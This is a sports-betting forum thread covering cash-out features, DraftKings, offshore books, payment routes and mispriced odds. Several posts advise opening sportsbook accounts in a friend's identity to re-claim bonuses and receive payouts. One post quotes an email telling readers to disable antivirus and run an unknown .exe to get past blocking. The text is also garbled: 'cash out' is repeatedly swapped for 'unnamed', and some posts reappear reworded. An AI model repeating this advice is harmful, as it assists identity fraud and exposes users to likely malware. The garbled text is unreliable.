just another way for losers to lose...

If I’ve already placed my bet, why on earth would I want to cash out for some tiny fraction of what it's actually worth right now? Unless we're talking about some massive, life-changing jackpot, this is just something people do when they're too scared to stick it out...

The only time I've ever used the cash out feature was if I realized I messed up a bet or made a total rookie mistake...

and then the house just takes their 10% cut regardless of how you play—that's really the whole game right there...

Hey, has anyone here tried opening a second account at DraftKings just to snag a bonus? I had an old account there ages ago and used their "FIRST" promo. After blowing through my balance, I stopped playing, but now I'm looking to get back in and grab that welcome offer again. Is it even possible to set one up under a friend's name but then have the winnings sent to my own bank account? Or does anyone know of another US sportsbook with a similar sign-up deal? Thanks.

What kind of idiotic question is even that? Of course nobody is going to let you open an account in your own name just to pay out to someone else. Or vice versa—it’s not happening.

If you're trying to juggle two accounts, or three, or whatever—your only shot is making sure every single detail matches up perfectly. And honestly, the easiest way to handle that is to just go ahead and open your own foreign currency accounts at three or four different major banks like Chase or Wells Fargo. This whole "using a friend's card" nonsense is just completely unprofessional.

Kyle Ward said:I find myself questioning the logic behind such foolish inquiries. It should be perfectly obvious that no legitimate institution will permit you to open an account in your own name while requesting payouts to a third party, nor would they allow the inverse arrangement.

If your intention is to manage two or more accounts, your sole recourse is to ensure that all personal data matches perfectly across all platforms. The most efficient way to facilitate this is to establish your own foreign currency accounts at three or four major US banks, such as Chase or Bank of America. This entire notion of relying on friends and their debit cards is fundamentally unprofessional and ill-advised.

The responses provided here are equally misguided. If you attempt to open multiple accounts under the same name at a single sportsbook—assuming such a thing is even permitted—they will simply terminate all of them immediately.

The only viable method is to register an account using a friend's identity and ensure the corresponding bank account is also held in that same friend's name.

Kenneth Rogers8 said:I’m thinking about getting into betting with some international online sportsbooks, so I’m trying to figure out the best way to handle deposits and withdrawals! What are the most cost-effective ways to move money if I really want to avoid using my main bank account?
For deposits, I was thinking maybe I could just grab a prepaid card from a local bank or even just pick up some unnamed or eCash vouchers somewhere. But honestly, I'm more worried about getting my winnings out. I'll probably be spread across a few different books, so I was looking at using Neteller or PayPal. I'm planning to do everything in USD—seems like the smartest move, right? Or should I bother with another currency? If I move my funds from the sportsbook to one of those e-wallets, I can just order their branded cards and use them to pay for stuff or hit up an ATM. Which route actually hits you less in fees: pulling cash from an ATM or just swiping the card at a store? Oh, and another wild idea to dodge the banks entirely—does anyone know if they actually mail out physical checks? It sounds like a massive headache and probably way too expensive with the processing fees. If anyone’s actually done this before, please weigh in; I just want the path of least resistance with the smallest possible cut taken by fees.

Look, I’ve been around the block a few times when it comes to online betting, so I might be able to shed some light here. Personally, I’d tell you to stick with PayPal or just go the unnamed route. Everything is pretty straightforward and secure, no real drama there.

You can pick up an unnamed voucher at basically any convenience store or gas station, kind of like how you'd grab a prepaid phone card or a Starbucks gift card.

Could someone give me a quick breakdown of how this actually works in practice? For instance, if I place a $10 bet split into four different plays at 2.0 odds, where one game kicks off at noon and another at 3:00 PM—meaning the timing doesn't align—what exactly am I getting when I use the unnamed, and what is the actual downside?

thanks!

thanks!

Here’s the deal from DraftKings... personally haven't messed with it yet.
The unnamed feature lets you grab some winnings before the game is even over. We’re adding even more control now by letting you use the unnamed option to settle just a piece of your bet.

When the unnamed option is up for grabs, you'll see a slider icon right next to the unnamed button.

To get that slider moving, just hit the icon. It'll show you the potential payout versus what you're leaving on the table right on the button. From there, pick your number and lock it in. The rest of your money stays riding until the final whistle.

Total control over your action.
There are plenty of ways to track the unnamed for bets that qualify.

Log in, and you'll see how many open bets you've got sitting right next to the unnamed. Just hit the unnamed to check out your eligible plays and the current unnamed.

The unnamed shows everything currently in-play, plus live scores and the current unnamed. You can also 'star' your picks by hovering over the top right corner.

You can also find your open bets at the top of the In-Play section or via your phone or tablet.

With unnamed and the unnamed option, you're calling the shots at DraftKings.

If anyone happens to have an account on the Italian version of DraftKings (strictly the Italy site)

They’re running wrong odds on that Irish Premier League match, the unnamed one...
The current offers are:
1.20 6.50 13.0

But they really should be:
3.25 3.25 2.15 if you look at the Asian markets...

Why am I only talking about the Italian DraftKings? Because over there, the law says if the odds are wrong, they can't just void the bet. They actually have to pay out...😁

P.S. If you try this on the .com site, expect a massive headache and a closed account. Just wanted to give you a heads-up before you get burned...😉

you will find that for the Irish Premier League match involving unnamed, the odds provided are completely erroneous.
They are offering:
1.20 6.50 13.0

whereas they truly ought to be:
3.25 3.25 2.15 (if one considers the Asian handicap markets)

Why am I specifically mentioning the Italian DraftKings? It is because under their local regulations, incorrect odds cannot simply be voided; instead, the bookmaker is legally obligated to honor the payout based on those faulty numbers.😁

P.S. Please be warned that if you attempt to place such bets via the standard .com site, you should fully expect a significant investigation and the eventual permanent closure of your account—I would hate for anyone to say they weren't cautioned ahead of time.😉

So, how does one actually 'acquire' an Italian account? 🤣

Does it genuinely make sense to maintain an account with a foreign sportsbook? I recall reading somewhere that once you factor in our domestic tax rates versus the lower odds typically found abroad, the net result ends up being roughly the same. Or am I perhaps just entertaining a complete absurdity?

why just the Italian site? because over there, the law says if the odds are wrong, they can't just void them—they actually have to pay out.😁
P.S. if you try this on the .com site, expect a total meltdown and a closed account. Just don't say I didn't warn you.😉

Interesting intel.
Though, I doubt anyone here actually has an Italian account, but man, wouldn't that be something.
A couple days ago, I caught one of those offshore sites and a big European bookie swapping the odds on a NASCAR race—like, turning a 1.20 into a 6.00 for a single matchup. I jumped on it immediately, and the next day they just refunded my money once they realized they screwed up. Total crooks.

Is it actually worth opening an account with a foreign sportsbook? I read somewhere that because of the tax laws here in the States, the odds over there end up being lower anyway, so it all evens out to nothing. Or am I just talking nonsense?

I’m guessing you’re just trolling??
Honestly, you’d have to be a complete idiot to keep betting with local domestic books when you could just have an account with one of the big international ones...

To get anything moving on any of these betting sites—whether it's DraftKings or Bwin or whatever else—you’re going to have to upload a photo of an American ID before you can even think about making that first deposit.

I don't have one myself, but a buddy of mine called in a favor from a friend, so he just opened an account and sent the money over to me and himself...😁

The game is set for April 10th. I'm going to try to grab a screenshot once it wraps up, just so there's proof and I don't end up having to hunt down paperwork later...

By the way, they shifted the odds to 2.05. I went with 2 at 13 and a draw at 6.5. Not looking to chase a perfect unit here...

By the way, they bumped the odds to 2.05. I took the 2 @13 and the X @6.5; I'm not trying to build toward a single win here.

Man, I wish I could too. *sniff*😢

You would honestly have to be a complete fool to be placing bets at our local bookies without having an account set up with one of the major international sportsbooks...

Oh, I am certainly not trying to provoke anyone; rather, I simply engage in betting somewhat sporadically, experiencing these peculiar phases where I might go several months without placing a single wager, only to find myself betting relentlessly for a month straight like a total addict..
Does any sort of tax apply to the payouts here?

I received this rather interesting email from an unnamed sportsbook, which, once run through a translator, roughly translates to this:

Dear Customers!

For your convenience, our experts have developed a simple new way to access the site should your service provider block it. All you need to do is install a small utility called fbpproxy.

Important: Before downloading and running install_fbpproxy.exe, you must temporarily disable any antivirus software running on your system, as it may block the program.

Download the file install_fbpproxy.exe
Run the file install_fbpproxy.exe
In the event of Windows prompt - confirm the start of the program.
Open your browser and navigate to the website - and enjoy more successful bets!

This method applies to Windows and higher operating systems.

There is a possibility that this solution might not work; if so, please try the other options described here: www.accessunnamed.com (or acfbc.info).
Also, remember that you can install our client software, which is easy to use and bypasses all locks!
Should you encounter any difficulties, please do not hesitate to contact our support team.

Removing fbpproxy (if necessary)

Important: Before downloading and running remove_fbpproxy.exe, you must temporarily disable any antivirus software running on your system, as it may block the program.

Download the file remove_fbpproxy.exe
Run the file remove_fbpproxy.exe
If prompted by Windows - confirm the start of the program.
A command prompt window will open stating: "Press any key to continue" - press any key.

Customer Service: 8 (800) 500-77-00

So, they are essentially suggesting ways to dodge the law, aren't they?😁

Does the government take a cut when you withdraw winnings?

No tax.
You just pull your money via PayPal or send it straight to your bank account...

Right, totally slipped my mind. With a PayPal card, you can basically shop wherever you want, buy whatever you feel like. You just gotta make sure there's actually money in there first.🙂

My take on DraftKings:

-Deposited via PayPal on Saturday afternoon (around 4:30 PM) and requested a withdrawal back to PayPal shortly after.
-Four hours later (around 8:30 PM), they hit me up for ID verification. Sent over a scan of my driver's license immediately.
-By Sunday morning at 11:05 AM, the cash was sitting in my PayPal account.

Total turnaround for the first payout? Less than 24 hours. 👍

The odds and selection are decent—nothing mind-blowing, but solid enough. They have a sign-up bonus, though it’s not available for US residents. 🙈
They also offer a bonus based on how many legs you add to your parlay; if you go big with 20 legs, you get an 80% boost on winnings (it's only 2% for a 4-legger). For anyone looking to go from "$1.75 rags to riches," it's actually a pretty interesting setup.

Bryan Adams6 said:So, I finally decided to give DraftKings a spin...
So, I went ahead and loaded my account using PayPal on Saturday around 4:30 PM, and then I put in a request to have the winnings sent right back to my PayPal. Just waiting on it now.
So, about four hours ago—around 8:30 PM—I get this email popping up in my inbox asking me to verify my identity. Just a standard request, I guess. So, I went ahead and sent over a scan of my driver's license. Typical stuff.
So, just a heads-up for everyone waiting on their cash—tomorrow, Sunday, around 11:05 AM, the payouts should hit your PayPal accounts.
Less than 24 hours until that first payout hits. 👍
The offers are alright—nothing mind-blowing, but they get the job done. They’ve got a sign-up bonus available, though it doesn't actually apply here in the States. 🙈

I gave it a spin myself. The selection and how they lay everything out is actually pretty solid. Sometimes they’re a little slow to adjust the margins, but honestly, I don't mind that much. No issues with account limits so far, either. All in all, it’s not a bad setup.
